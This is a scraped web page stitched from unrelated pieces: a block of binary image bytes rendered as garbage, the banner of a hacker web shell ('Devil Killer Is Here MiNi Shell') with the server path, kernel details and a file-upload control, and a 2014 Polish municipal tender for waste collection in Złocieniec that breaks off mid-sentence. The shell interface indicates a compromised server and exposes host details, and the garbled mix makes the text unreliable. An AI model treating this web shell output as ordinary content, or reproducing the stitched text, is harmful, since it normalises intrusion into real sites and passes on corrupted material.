JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20141208/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20141208/402154-N-2014.html

<p class="kh_header"><b>Złocieniec: Świadczenie usług związanych z odbieraniem i przekazywaniem odpadów komunalnych odebranych od właścicieli nieruchomości z terenu gminy Złocieniec z sektora II</b><br>
<b>Numer ogłoszenia: 402154 - 2014; data zamieszczenia: 08.12.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Złocieniec , Stary Rynek 3, 78-520 Złocieniec, woj. zachodniopomorskie, tel. (094) 36 72 022.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zlocieniec.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Świadczenie usług związanych z odbieraniem i przekazywaniem odpadów komunalnych odebranych od właścicieli nieruchomości z terenu gminy Złocieniec z sektora II.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest świadczenie kompleksowej usługi związanej z:
1.odbieraniem odpadów komunalnych z terenu gminy Złocieniec, z sektora II,  od właścicieli nieruchomości zamieszkałych oraz nieruchomości, które w części stanowią nieruchomość, na której zamieszkują mieszkańcy a w części nieruchomość, na której nie zamieszkują mieszkańcy, a powstają odpady komunalne
2.transportem i przekazywaniem odebranych odpadów komunalnych do stacji przeładunkowej
w Mielenku Drawskim stacja przeładunkowa funkcjonująca w ramach RZGO w Słajsinie
3.utworzeniem, obsługą i przekazywaniem odpadów ze stacjonarnego Punktu Selektywnej Zbiórki Odpadów Komunalnych - zgodnie z obowiązującymi przepisami prawa krajowego oraz aktami prawa miejscowego, 
Przedmiotem zamówienia jest świadczenie ww. kompleksowej usługi, a w szczególności:
1.odbieranie odpadów komunalnych zmieszanych i segregowanych z terenu gminy Złocieniec, z sektora II, od właścicieli nieruchomości zamieszkałych oraz nieruchomości, które w części stanowią nieruchomość, na której zamieszkują mieszkańcy a w części nieruchomość, na której nie zamieszkują mieszkańcy, a powstają odpady komunalne, w sposób zmierzający do zapewnienia osiągnięcia odpowiednich poziomów recyklingu, przygotowania do ponownego użycia i odzysku innymi metodami oraz ograniczenie masy odpadów komunalnych ulegających biodegradacji przekazywanych do składowania. 
Odbiorem muszą być objęte następujące rodzaje odpadów :
20 03 01 - niesegregowane zmieszane odpady komunalne 
15 01 01 - opakowania z papieru i tektury
15 01 02 - opakowania z tworzyw sztucznych
15 01 03 - opakowania z drewna
15 01 04 - opakowania z metali
15 01 05 - opakowania wielomateriałowe
15 01 06 - zmieszane odpady opakowaniowe
15 01 07 - opakowania ze szkła
15 01 09 - opakowania z tekstyliów
20 01 01 - papier i tektura
20 01 02 - szkło
20 01 10 - odzież
20 01 11 - tekstylia
20 01 33 - baterie i akumulatory łącznie z bateriami i akumulatorami wymienionymi w 16 06 01, 
16 06 02 lub 16 06 03 oraz niesortowane baterie i akumulatory zawierające te baterie
20 01 34 - baterie i akumulatory inne niż wymienione w 20 01 33
20 01 35 - zużyte urządzenia elektryczne i elektroniczne inne niż wymienione w 20 01 21 
 i 20 01 23 zawierające niebezpieczne składniki 1
20 01 36 - zużyte urządzenia elektryczne i elektroniczne inne niż wymienione w 20 01 21,
20 01 23 i 20 01 35
20 01 39 - tworzywa sztuczne
20 01 40 - metale
20 03 07 - odpady wielkogabarytowe
20 03 99 - odpady komunalne niewymienione w innych podgrupach
17 01 01 - odpady z betonu oraz gruz betonowy z rozbiórek i remontów
17 04 05- żelazo i stal
16 01 03 - zużyte opony
20 01 32 -  leki inne niż wymienione w 20 01 31
20 01 08 - odpady kuchenne ulegające biodegradacji,
20 02 01 - odpady ulegające biodegradacji;
2.transport odebranych odpadów zmieszanych i selektywnie zebranych, oprócz przeterminowanych leków do stacji przeładunkowej w Mielenku Drawskim, dostarczenie odpadów ma zostać potwierdzone kartą przekazania odpadów, którą każdego miesiąca Wykonawca dostarczy Zamawiającemu do 5 dnia miesiąca za miesiąc poprzedni, Wykonawca jest zobowiązany do przedłożenia zamawiającemu wraz z fakturą następujących dokumentów za okres rozliczeniowy:
1)zestawienia raportów wagowych ze Stacji Przeładunkowej w Mielenku Drawskim,
2)zestawienia dowodów przyjęcia poszczególnych rodzajów odebranych odpadów komunalnych kart przekazania odpadów sporządzonych zgodnie z obowiązującymi przepisami,
3)ilość poszczególnych rodzajów odpadów wykazanych na kartach przekazania odpadów powinna odpowiadać ilości wynikającej z raportów wagowych za odpowiedni okres rozliczeniowy.
3.do 05.01.2015 r. - wyposażenie każdej nieruchomości zamieszkałej w całości lub w części w pojemniki do zbierania odpadów komunalnych zmieszanych. Szacuje się, że należy wyposażyć nieruchomości w ok. 1800 szt. pojemników o pojemności 110/120 l, ok. 93 szt. pojemników o pojemności 240 l oraz ok. 230 szt. pojemników o pojemności 1100 l. Ilości są szacunkowe i mogą ulec zmianie. Oznakowanie odpowiednimi naklejkami pojemników do zbierania odpadów komunalnych.
4.Wyposażenie miejsc wskazanych w załącznikach do SIWZ w pojemniki do zbierania odpadów zmieszanych, biodegradowalnych, selektywnych i szkła - umieszczonych w altanach w ilości: ok. 82 szt. o pojemności 110/120 l, ok. 48 szt. pojemników o pojemności 240 l oraz ok. 253 szt. pojemników o pojemności 1100 l.
5.Ustawienie ok. 100 pojemników do selektywnej zbiórki odpadów o poj. co najmniej 1100 l selektywne i szkło w tzw. gniazdach i odbiór odpadów zbieranych selektywnie w tzw. gniazdach zlokalizowanych poza altanami 181 pojemników o poj. 1100 l w mieści i na wsiach - wg załącznika do SIWZ
6.utworzenie i prowadzenie Punktu Selektywnej Zbiórki Odpadów Komunalnych - zgodnie z uchwałą nr XLIV 372 2014 Rady Miejskiej w Złocieńcu z dnia 27.03.2014 r. w sprawie szczegółowego sposobu i zakresu świadczenia usług w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości i zagospodarowania tych odpadów, w zamian za uiszczoną przez właściciela nieruchomości opłatę za gospodarowanie odpadami komunalnymi -  w godz od 9.00 do 17.00 i w soboty od 9.00 do 13.00. Wyposażenie PSZOK w odpowiednie pojemniki lub pomieszczenia do gromadzenia odebranych odpadów, utrzymanie ich w odpowiednim stanie technicznymi sanitarnym i porządkowym, zorganizowanie PSZOK w sposób zapewniający łatwy dostęp dla wszystkich mieszkańców gminy Złocieniec oraz bezpieczny dla użytkowników. Wykonawca prowadzący PSZOK zobowiązany jest do zbierania i magazynowania odpadów komunalnych w sposób zgodny z obowiązującymi przepisami, w szczególności z ustawą z dnia 14 grudnia 2012 r. o odpadach, ewidencjonowanie przyjętych odpadów zgodnie z obowiązującymi przepisami, w tym w szczególności poprzez zważenie ilość przyjętych odpadów i odnotowanie w ewidencji wraz ze wskazaniem posesji/właściciela nieruchomości, wydanie mieszkańcowi dokumentu potwierdzającego przyjęcie jego odpadów do PSZOK,
7.prowadzenie zbiórki mebli i innych odpadów wielkogabarytowych, zużytego sprzętu elektrycznego i elektronicznego oraz zużytych opon - raz na kwartał - w terminach określonych w regulaminie utrzymania czystości i porządku na terenie gminy Złocieniec - Uchwała nr XLIV 373 2014 Rady Miejskiej w Złocieńcu z dnia 27.03.2014 r. w sprawie regulaminu utrzymania czystości i porządku na terenie gminy Złocieniec
8.prowadzenie w ramach PSZOK punktu obsługi klienta, czynnego w godz. pracy PSZOK, w którym będzie możliwe osobiste, telefoniczne bądź mailowe składanie reklamacji związanych z wykonywanymi usługami oraz uzyskanie informacji nt. zasad prowadzenia odbioru odpadów komunalnych, segregacji odpadów itp.
9.umożliwienie przez wykonawcę wyposażenia nieruchomości w pojemniki na odpady komunalne biodegradowalne lub zbierane selektywnie i szkło o odpowiedniej pojemności w formie użyczenia, najmu lub sprzedaży właścicielom nieruchomości  - w miarę potrzeb,
10.dezynfekcja i odkażanie pojemników po odbiorze odpadów - w okresie od 1.04 do 31.08. - raz w tygodniu, w pozostałych miesiącach -  dwa razy w miesiącu. mycie  pojemników do selektywnej zbiórki odpadów - wg potrzeb
11.wybiałkowanie altan śmietnikowych - dwa razy w trakcie realizacji niniejszego zamówienia -  w terminie uzgodnionym z zamawiającym, kwietniu 2015 r. i wrześniu 2015 r.
12.wykonawca zobowiązany jest do monitorowania zapełnienia pojemników, w tym zapewnienie zwiększenia częstotliwości odbioru odpadów np. w okresie okołoświątecznym,
13.zapewnienie obsługi m.in. opróżnianie, mycie pojemników siatkowych, typu igloo oraz pojemników o poj. 1100 l - przeznaczonych do selektywnej zbiórki  odpadów komunalnych stojących na terenach przeznaczonych do użytku publicznego - sukcesywnie w miarę potrzeb - uwzględniając zapisy uchwały nr XLIV 373 2014 Rady Miejskiej w Złocieńcu,
14.odbiór przeterminowanych leków z pojemnika zlokalizowanego w Aptece Deszczowa przy
ul. Piłsudskiego w Złocieńcu oraz PSZOK i przekazywanie ich do spalarni odpadów np. przyszpitalnej - wg potrzeb,
15.opracowanie stałych harmonogramów odbierania odpadów komunalnych z terenu gminy, z sektora II, uwzględniając dane przekazane przez Gminę Złocieniec, z zastrzeżeniem, że w przypadku, gdy dzień odbioru odpadów przypada w dzień ustawowo wolny od pracy, dniem odbioru odpadów jest pierwszy dzień niebędący dniem ustawowo wolnym od pracy, następujący po dniu wolnym. Przedstawienie harmonogramów odbioru odpadów do akceptacji przez przedstawiciela Gminy Złocieniec - w terminie przed podpisaniem umowy na realizację zadania.
16.prowadzenie dokumentacji związanej z przedmiotem zamówienia.
17.wykonawca zobowiązany jest do oznaczenia pojemników nieobjętych przedmiotem zamówienia, a których jest właścicielem i świadczy usługę odbioru odpadów na rzecz właścicieli nieruchomości niezamieszkałych z terenu gminy Złocieniec nieobjętych gminnym systemem odbierania odpadów komunalnych, pojemniki można oznakować np. naklejką. 
18.	zamawiający wymaga, aby wykonawca dysponował samochodem do przeprowadzania kontroli w obecności przedstawiciela wykonawcy i zamawiającego dotyczących prawidłowości świadczonych usług, m in.  w przypadku zgłaszanych uwag, zastrzeżeń, reklamacji, itp.
19.wykonawca ponosi pełną odpowiedzialność za należyte wykonywanie powierzonych czynności zgodnie z obowiązującymi przepisami i normami oraz naprawia szkody wyrządzone zamawiającemu lub osobom trzecim w związku z wykonywaniem usług związanych z realizacją przedmiotu zamówienia,
20.	wykonawca zobowiązany jest do odbierania odpadów komunalnych od właścicieli nieruchomości w godz. od 6.00 do 22.00,
21.w przypadku zamieszkania mieszkańców w nowych nieruchomościach, wykonawca odbierze odpady komunalne z tych nieruchomości wg nowego harmonogramu, który przekaże zamawiającemu w ciągu tygodnia od zgłoszenia,
22.odpady należy odbierać zgodnie z harmonogramem, w przypadku braku możliwości odbioru odpadów z przyczyn niezależnych od wykonawcy, wykonawca niezwłocznie jednak nie później niż następnego dnia roboczego, w którym zdarzenie nastąpiło powiadomi zamawiającego o tym fakcie. Niepowiadomienie o tym fakcie zamawiającego spowoduje naliczenie kar umownych.
23.Wykonawca tak opracuje trasę przejazdu, aby odpady były zbierane z terenu gminy z sektora II, tylko z nieruchomości, na których zamieszkują mieszkańcy oraz nieruchomości mieszanych objętych systemem gminnym. Nie dopuszcza się zbierania dopełniania pojazdu odpadami z terenu innej gminy lub z nieruchomości, na których nie zamieszkują mieszkańcy.
24.Wykonawca jest obowiązany do sporządzania sprawozdań zgodnie ze wzorem określonym w Rozporządzeniu Ministra Środowiska z dnia 15 maja 2012 r. w sprawie wzoru sprawozdań o odebranych odpadach komunalnych, odebranych nieczystości ciekłych oraz realizacji zadań z zakresu gospodarowania odpadami komunalnymi Dz. U. z 2012 r., poz. 630. Sprawozdanie jest przekazywane Zamawiającemu w terminie do końca miesiąca następującego po kwartale, którego dotyczy. 
25.jeżeli wykonawca odbiera niesegregowane odpady komunalne od właścicieli nieruchomości niezamieszkałych z terenu Gminy Złocieniec, w sprawozdaniu zawiera dodatkowo informacje o liczbie umów podpisanych z właścicielami nieruchomości niezamieszkałych, w które są wyposażone nieruchomości niezamieszkałe, częstotliwości odbioru oraz masie odebranych odpadów komunalnych wyrażonej w Mg, z dokładnością do 2 miejsc po przecinku.
26.Wykonawca co miesiąc dostarczać będzie Zamawiającemu sprawozdanie z ilości odebranych odpadów. Do sprawozdania Wykonawca jest zobowiązany dołączyć kopie dziennych kwitów wagowych pojazdów, które wykorzystane będą do realizacji zamówienia. Sprawozdanie Wykonawca przekazuje Zamawiającemu do 5-tego dnia miesiąca następującego po miesiącu, którego zestawienie dotyczy.
27.Odbiór usług będących przedmiotem niniejszej umowy odbywać się będzie w terminie comiesięcznym i zakończony jest sporządzeniem miesięcznego protokołu odbioru świadczenia usługi, zaopatrzonego podpisami obu stron. Wykonawca dodatkowo przekaże miesięczny protokół odbioru świadczenia usługi w formie elektronicznej mailem lub na płycie CD. 
28.W skład miesięcznego protokołu odbioru usługi wchodzą dokumenty zawierające następujące informacje o:
a) ilości odebranych odpadów komunalnych zmieszanych Mg;
b) ilości selektywnie zebranych odpadów Mg; 
c) ilości odebranych odpadów wielkogabarytowych, zużytego sprzętu elektrycznego sprzętu 
elektrycznego i elektronicznego oraz zużytych opon Mg,
d) ilość odebranych odpadów budowlanych i rozbiórkowych wraz z podaniem:
- adresów nieruchomości, z których dokonano odbioru,
- ilości odpadów odebranych z poszczególnych nieruchomości,
e) ilości odebranych przeterminowanych leków,
29. Zamawiający w terminie 5 dni roboczych akceptuje pisemnie miesięczny protokół odbioru świadczenia usługi lub zgłasza uwagi.
30. W przypadku zgłoszenia nieprawidłowości w realizacji przedmiotu umowy przez Zamawiającego lub mieszkańca gminy Złocieniec Wykonawca przyjmuje i załatwia reklamacje w terminie 2 dni od dnia otrzymania zgłoszenia reklamacji oraz niezwłocznie informuje Zamawiającego na piśmie o sposobie załatwienia każdej zgłoszonej reklamacji.
31. W przypadku nieuwzględnienia reklamacji przez wykonawcę, wykonawca przekazuje zamawiającemu niezwłocznie informację o tym fakcie podając przyczynę nieuwzględnienia reklamacji wraz z dokumentacją  np. fotograficzną. 
32.  W celu rozpatrzenia reklamacji Zamawiającego, Wykonawca obowiązany jest stawić się w siedzibie Zamawiającego bez zbędnej zwłoki, w tym samym dniu do godziny 14.00 lub najpóźniej do godziny 12.00 następnego dnia pod warunkiem, iż jest to dzień roboczy, od powiadomienia przez Zamawiającego.
33. Wykonawca zobowiązany jest informować Zamawiającego o każdym przypadku niedopełnienia obowiązku segregacji przez osoby zamieszkujące daną nieruchomość. Jeżeli Wykonawca stwierdzi, że w pojemniku zamiast odpadów selektywnych znajdują się zmieszane odpady komunalne, w terminie 2 dni roboczych jest zobowiązany powiadomić Zamawiającego. Na tę okoliczność sporządza protokół oraz przedstawia właściwą dokumentację - wykonuje zdjęcia, które pozwolą na potwierdzenie faktu nie wywiązania się z obowiązku segregacji odpadów przez mieszkańców. Wzór protokołu stanowi załącznik do SIWZ. W sytuacji opisanej powyżej Wykonawca odbiera od właściciela nieruchomości zamieszkałej zgromadzone odpady, traktując je jako odpady zmieszane. 
34.Zakres odpowiedzialności Wykonawcy obejmuje wszelkie czynności zmierzające do realizacji umownych obowiązków Wykonawcy oraz za dochowanie wszelkich obowiązków w szczególności ustawowych.
35.Wykonawca ponosi pełną odpowiedzialność wobec Zamawiającego i osób trzecich za szkody na mieniu i zdrowiu osób trzecich, powstałe podczas i w związku z realizacją przedmiotu umowy, odpowiada za uszkodzenie lub zniszczenie pojemników podczas wykonywania usługi, na zasadach wynikających z kodeksu cywilnego. 
Wykonawca wszystkie odebrane z terenu gminy Złocieniec z sektora II odpady komunalne zmieszane odpady komunalne oraz selektywnie zbierane poza przeterminowanymi lekami przekazywać będzie do Stacji Przeładunkowej odpadów w Mielenku Drawskim. Przeterminowane lekarstwa należy przekazywać do spalarni odpadów np. przyszpitalnej.
inne informacje
1.powierzchnia gminy Złocieniec - 194,9 km2, w tym miasto -  32,3 km2 i gmina- 162,6 km2
2.Szacunkowa ilość odpadów do odebrania od właścicieli nieruchomości z terenu gminy Złocieniec w okresie objętym zadaniem tj :
1)zmieszane niesegregowane odpady komunalne - 2822 Mg
2)selektywnie zbierane odpady komunalne - 413 Mg
3)selektywnie zbierane odpady komunalne ulegające biodegradacji - 211 Mg
4)odpady wielkogabarytowe - 69 Mg
5)odpady budowlane i rozbiórkowe - 69 Mg
3.miejscowości na terenie gminy: 
1)Złocieniec, 
2)sołectwo Cieszyno (Cieszyno, Skąpe),
3)sołectwo Warniłęg (Warniłęg, Męcidół, Szymalów, Małobór, Jadwiżyn, Uraz), 
4)sołectwo Stare Worowo, 
5)sołectwo Bobrowo (Bobrowo, Wąsosz, Sułoszyn),
6)sołectwo Stawno, 
7)sołectwo Lubieszewo (Lubieszewo, Zatonie, Błędno)
8)sołectwo Kosobudy (Kosobudy, Kosobudki, Jarosław), 
9)sołectwo Rzęśnica, 
10)sołectwo Darskowo.
Odebrane odpady komunalne należy kierować do RZGO w Słajsinie, a w razie awarii do wskazanej w WPGO dla Woj. Zachodniopomorskiego instalacji zastępczej.
Wykonawca będzie rozliczał się miesięcznie z Zamawiającym w zakresie zapłaty za usługę, która obejmuje zbieranie i transport do wyznaczonego miejsca odpadów komunalnych zmieszanych i segregowanych wraz z wszystkimi kosztami i opłatami z tym związanymi.
W przypadku składania oferty przez dwa lub więcej podmiotów Wykonawców wspólnie ubiegających się o udzielenie zamówienia np. konsorcja, spółki cywilne itp. ocena spełnienia warunku odbędzie się w następujący sposób: co najmniej jeden podmiot powinien dysponować odpowiednimi dokumentami np.
a)wpis do rejestru działalności regulowanej w zakresie odbioru odpadów komunalnych od właścicieli nieruchomości z terenu gminy Złocieniec
b)aktualne zezwolenie na transport odpadów w zakresie objętym przedmiotem zamówienia, zgodnie z z art. 233 ustawy z dnia 14 grudnia 2012 r. o odpadach Dz. U, z 2013 poz. 21, a po utworzeniu rejestru, o którym mowa w art. 49 ust. 1 ww. ustawy - uzyskania wpisu do tego rejestru, z uwzględnieniem art. 234 ust 2 ww. ustawy,
c)Wpis do rejestru podmiotów zbierających zużyty sprzęt elektryczny i elektroniczny prowadzony przez Głównego Inspektora Ochrony Środowiska.
Wykonawca przy realizowaniu przedmiotu umowy może posługiwać się Podwykonawcami za których działania odpowiada jak za własne. Wykonawca odpowiada samodzielnie za zapłatę wynagrodzenia należnego Podwykonawcy z tytułu realizacji umowy
Wymagania dotyczące pojazdów i bazy magazynowo - transportowej: 
1. Wykonawca musi spełniać szczegółowe wymagania stawiane przedsiębiorcom odbierającym odpady komunalne od właścicieli nieruchomości ustalone w ustawie o utrzymaniu porządku i czystości w  gminach oraz aktach wykonawczych do niej tj.  dysponować bazą magazynowo -transportową usytuowaną na terenie administracyjnym gminy Złocieniec lub w odległości nie większej niż 60 km od granicy gminy Złocieniec, na terenie, do którego posiada tytuł prawny, która spełnia warunki określone Rozporządzeniem Ministra Środowiska z dnia 11 stycznia 2013 r . w sprawie szczegółowych wymagań w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości. W dniu rozpoczęcia realizacji usługi odbioru i transportu odpadów na rzecz Zamawiającego baza magazynowo -transportowa winna spełniać wymagania rozporządzenia Ministra Środowiska z dn. 11.01.2013r. w sprawie szczegółowych wymagań w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości Dz. U. z 2013 r. poz.122.
2. Wykonawca w całym okresie obowiązywania umowy na odbiór odpadów musi posiadać wyposażenie umożliwiające odbieranie odpadów komunalnych od właścicieli nieruchomości, w  postaci: 
1) co najmniej 2 słownie: dwa pojazdy specjalistyczne przystosowane do odbioru zmieszanych odpadów komunalnych  
2) co najmniej 2 słownie: dwa pojazdy przystosowane do odbierania selektywnie zebranych odpadów komunalnych, 
3) co najmniej 1 pojazd do odbioru odpadów bez funkcji kompaktującej.
3. Wykonawca zapewnia, aby pojazdy były wyposażone w system:
1)monitoringu bazującego na systemie pozycjonowania satelitarnego, umożliwiający trwałe zapisywanie, przechowywanie i odczytywanie danych o położeniu pojazdu i miejscach postojów oraz 
2)czujników zapisujących dane o miejscach wyładunku odpadów- umożliwiający weryfikację tych danych;
3)pojazdy były wyposażone w narzędzia lub urządzenia umożliwiające sprzątanie terenu po opróżnieniu pojemników,
4. Wymagania techniczne dodatkowe dotyczące pojazdów, o których mowa w pkt. 2 i ich wyposażenie:
1)muszą być zarejestrowane i dopuszczone do ruchu oraz posiadać aktualne badania techniczne i świadectwa dopuszczenia do ruchu zgodnie z przepisami o ruchu drogowym, 
2)winny umożliwiać odbiór odpadów z terenów trudno dostępnych,
3)wyposażenie w urządzenia do transmisji danych ewidencjonowanych w trakcie realizacji zlecenia
4)wykonawca ma obowiązek dokonywać odbioru i transportu odpadów również w przypadkach , kiedy dojazd do miejsc odbioru odpadów komunalnych np. bloków, kamienic, posesji indywidualnych będzie znacznie utrudniony, np. z powodu remontów dróg, awarii itp. W takich przypadkach wykonawcy nie przysługują roszczenia z tytułu wzrostu kosztów realizacji przedmiotu umowy.
5. System monitoringu bazujący na GPS. 
Przesył danych z urządzeń dodatkowych musi być jednoczesny z danymi z systemu monitoringu GPS i dostępny w trybie online kontakt  i odczyt danych w dowolnym momencie.
Dane z systemów monitorujących powinny być dostępne zamawiającemu w sposób ciągły  i nieprzerwany przez minimum rok od zaistnienia danego  zdarzenia. 
Wszystkie zarejestrowane zdarzenia muszą być rozszerzone o dokładną datę i czas oraz współrzędne geograficzne zdarzeń wyznaczone na podstawie systemu GPS;
W trakcie realizacji usługi odbioru odpadów Wykonawca zobowiązany jest do rejestrowania poprzez systemy GPS następujących danych:
a)rzeczywistego przebiegu trasy
b)czasu i miejsca zakończenia usługi przekazania odpadów.
6.Czujnik wyładowania odpadów. 
Wykonawca wyposaży wszystkie pojazdy służące do odbioru odpadów w czujnik pozwalający określić lokalizację pojazdu podczas otwierania odwłoka w czasie opróżniania zabudowy służące do odbioru odpadów. 
7. Wykonawca obowiązany jest utrzymywać w pełnej sprawności urządzenia rejestrujące pracę pojazdów tj. system GPS tak, aby wykonanie każdej usługi odbioru odpadów z nieruchomości zostało przez nie zarejestrowane.
Wykonawca zobowiązany jest do wyposażenia wszystkich pojazdów przeznaczonych do wykonywania usługi odbioru odpadów w urządzenia zapewniające bieżący monitoring pracy tj. odbiornik GPS, odpowiedni moduł komunikacyjny oraz nadajnik, który przesyłać będzie dane drogą internetową do komputerów Zamawiającego - zgodnie z wymaganiami SIWZ. 
Wykonawca jest zobowiązany przekazać i zainstalować na co najmniej dwóch stanowiskach komputerowych zamawiającego niezbędne oprogramowanie, wraz z dodatkowymi niezbędnymi elementami, umożliwiające sprawowanie bieżącego monitoringu oraz odtwarzanie i analizę historii pracy sprzętu z okresu realizacji umowy na terenie gminy Złocieniec.
Wykonawca zobowiązany jest,  aby wszystkie pojazdy wykorzystywane do realizacji przedmiotu zamówienia były wyposażone w urządzenia monitorujące umożliwiające automatyczne zapisywanie w nieulotnej pamięci czasu pracy, aktualnej lokalizacji i przebytej drogi pojazdów z rzeczywistym, jednoznacznie wykazanym wykonywaniem czynności wyładowanie odpadów co 10 sekund lub częściej;  pamięć danych powinna być archiwizowana i odczytywalna przez cały okres realizacji przedmiotu zamówienia; zapewnienie Zamawiającemu w jego siedzibie dostępu do systemu monitorowania pracy pojazdów wykorzystywanych do realizacji przedmiotu zamówienia systemu stanowiącego własność Wykonawcy obejmującego co najmniej:
